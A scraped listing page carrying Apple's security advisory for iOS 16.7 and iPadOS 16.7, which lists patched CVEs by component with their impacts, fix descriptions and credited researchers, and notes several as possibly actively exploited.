-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJcACgkQX+5d1TXa  
Ivrutw/+Ol5wjstHEfGsIssJnU3b7HQCOvYrKn1SS6tZSVfh7AGB3wsqAn5RWSef  
bPnbHweF7/RFr87JIQcC0I/4gndXoLue4C0yr5zOS1QvH4F/WgUgoOgrJwMg0EfK  
vLWivfNuQyYPgmcmY9wQSJoaV+Rtty6v+EcefPWKMudWJ106javKmJM91TAaKYlv  
t+IRVudrG7ZElxIIMKRdwICbhx/AFpCApRIzkYj+pMLMnPyOtxg40Qa+a8bteM0q  
Yc2Q/muAfDDJfgKUPGDh6OlnGsz9ThcxwTVwy7dlC4ekGRjTReQ4iMBpw/vJhWjV  
SpheUsyNnmuPnOT79FpZN1OwWSlgogtmPdgjKhzoHBpoV9hHf1d3ZP/7kQY1E3NC  
OBIG7Jl2Yf/g3ynsL/fVW60c833d2HGGiXfF+OW4D11XF73fovh1qPUMTGHV67m+  
hnuSJEEVZBbRH0sicxCAlAT1IN3JW91wgSxGvAVQ3D83uARvqJJHPjr0GU4jbXBK  
GkZlI6/ATOT9vYRtlRL1oXKMsl9Mz+WUYGqjhtGJhxHSAz/I4nNTN/HIb0aoEOqo  
7mi86X2Etc+3jy2Y5Injqbyqre+Jybg2JiO+DggHhTBV2y02yScxhWGroO3dmJpL  
bEcR+YXsUs51E6fcUYag6CVi9Bi4F5nXHVw9Bs8TXmR/IPfO4NQ=  
=FJcW  
-----END PGP SIGNATURE-----

Apple Security Advisory 09-26-2023-4

Apple Security Advisory 09-26-2023-3 - iOS 16.7 and iPadOS 16.7 addresses bypass, code execution, and out of bounds read vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-09-26-2023-3 Additional information for APPLE-SA-2023-09-21-3 iOS 16.7 and iPadOS 16.7iOS 16.7 and iPadOS 16.7 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213927.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.App StoreAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: A remote attacker may be able to break out of Web ContentsandboxDescription: The issue was addressed with improved handling ofprotocols.CVE-2023-40448: w0wboxEntry added September 26, 2023Biometric AuthenticationAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to disclose kernel memoryDescription: An out-of-bounds read was addressed with improved boundschecking.CVE-2023-41232: Liang Wei of PixiePoint SecurityEntry added September 26, 2023CoreAnimationAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: Processing web content may lead to a denial-of-serviceDescription: The issue was addressed with improved memory handling.CVE-2023-40420: 이준성(Junsung Lee) of Cross RepublicEntry added September 26, 2023Game CenterAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to access contactsDescription: The issue was addressed with improved handling of caches.CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive SecurityEntry added September 26, 2023KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.Entry added September 26, 2023KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An attacker that has already achieved kernel code execution maybe able to bypass kernel memory mitigationsDescription: The issue was addressed with improved memory handling.CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)Entry added September 26, 2023KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: A local attacker may be able to elevate their privileges. Appleis aware of a report that this issue may have been actively exploitedagainst versions of iOS before iOS 16.7.Description: The issue was addressed with improved checks.CVE-2023-41992: Bill Marczak of The Citizen Lab at The University ofToronto's Munk School and Maddie Stone of Google's Threat Analysis GrouplibxpcAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to access protected user dataDescription: An authorization issue was addressed with improved statemanagement.CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab(xlab.tencent.com)Entry added September 26, 2023libxpcAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to delete files for which it does not havepermissionDescription: A permissions issue was addressed with additionalrestrictions.CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab(xlab.tencent.com)Entry added September 26, 2023libxsltAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: Processing web content may disclose sensitive informationDescription: The issue was addressed with improved memory handling.CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK SecurityEntry added September 26, 2023MobileStorageMounterAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: A user may be able to elevate privilegesDescription: An access issue was addressed with improved accessrestrictions.CVE-2023-41068: Mickey Jin (@patch1t)Entry added September 26, 2023Pro ResAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2023-41063: Certik Skyfall TeamEntry added September 26, 2023SafariAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to identify what other apps a user hasinstalledDescription: The issue was addressed with improved checks.CVE-2023-35990: Adriatik Raci of Sentry CybersecurityEntry added September 26, 2023SecurityAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: A malicious app may be able to bypass signaturevalidation. Apple is aware of a report that this issue may have beenactively exploited against versions of iOS before iOS 16.7.Description: A certificate validation issue was addressed.CVE-2023-41991: Bill Marczak of The Citizen Lab at The University ofToronto's Munk School and Maddie Stone of Google's Threat Analysis GroupShare SheetAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: An app may be able to access sensitive data logged when a usershares a linkDescription: A logic issue was addressed with improved checks.CVE-2023-41070: Kirin (@Pwnrin)Entry added September 26, 2023WebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rdgeneration and later, iPad 5th generation and later, and iPad mini 5thgeneration and laterImpact: Processing web content may lead to arbitrary codeexecution. Apple is aware of a report that this issue may have beenactively exploited against versions of iOS before iOS 16.7.Description: The issue was addressed with improved checks.WebKit Bugzilla: 261544CVE-2023-41993: Bill Marczak of The Citizen Lab at The University ofToronto's Munk School and Maddie Stone of Google's Threat Analysis GroupAdditional recognitionAppSandboxWe would like to acknowledge Kirin (@Pwnrin) for their assistance.Entry added September 26, 2023libxml2We would like to acknowledge OSS-Fuzz, Ned Williamson of Google ProjectZero for their assistance.Entry added September 26, 2023KernelWe would like to acknowledge Bill Marczak of The Citizen Lab at TheUniversity of Toronto's Munk School and Maddie Stone of Google's ThreatAnalysis Group for their assistance.WebKitWe would like to acknowledge Khiem Tran, Narendra Bhati From Suma SoftPvt. Ltd, Pune (India) for their assistance.Entry added September 26, 2023WebRTCWe would like to acknowledge anonymous researcher for their assistance.Entry added September 26, 2023This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.7 and iPadOS 16.7".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJYACgkQX+5d1TXaIvpAZBAAwt2P4P00xvAkwAiuPBf8IiaotxTgIVyUWKHWteDuUPKYm/I6gI10L/a1zWf9eHpFtiEtGsJ6ggXmbyXMBjKCEUglSqadeAaikMsQjeKyPTHwba00TMqhg5H3Cl7VB8QTW6CQtW+38M2z9hAQuEbGkgdgLR+GmEV84VrAz6nD3uzv+D84M4yrcGndVuaI6oENRGK+u+pYUAjlc1Q7B7np8fME4kTEwE29RXQBTmSzaMBSPDcL6bysLbQ/5KqyeGJqapeK7VY6DWHFlidjO205Y/s6sjyMtSTgNgcMQv90YSN2RGi2xzv69Hw0KWhWbZK9Clz/sYrJf9EDXEoPh/4D/khWVbiiRTyhIcpz/BbRmxnV+Ns5Bq1RHAax4MQrIoUSBCoswbA/LRZ2vryvNAHXXbgyA6zZhPwud6XhFdyElEMV7/rj5w6KYWxTitBBwPRv7iOnJS2kKvzDVklwYbzesrNjohGygLmSP69areh25NbAHr9FViiFf2mQtGkYsIbVSL0ds1oKieZGYJlymVfc2F0bxy1OL+MvKTRZPflXFW3j1MIroK2zcrzx55YzRClZY1TIT2NxcQec3IG50+r6mOhJoS8OqVa97ID6YQ1/DixxKucL0bK0H8NvuTq81vnJjAZPY1lXpNz2UjFbyt2+rdjAsbM1UJY0VRJeuM5lfF0==4GXG-----END PGP SIGNATURE-----

Apple Security Advisory 09-26-2023-3

Apple Security Advisory 09-26-2023-2 - macOS Sonoma 14 addresses buffer overflow, bypass, code execution, out of bounds read, resource exhaustion, spoofing, and use-after-free vulnerabilities.

Tag

#js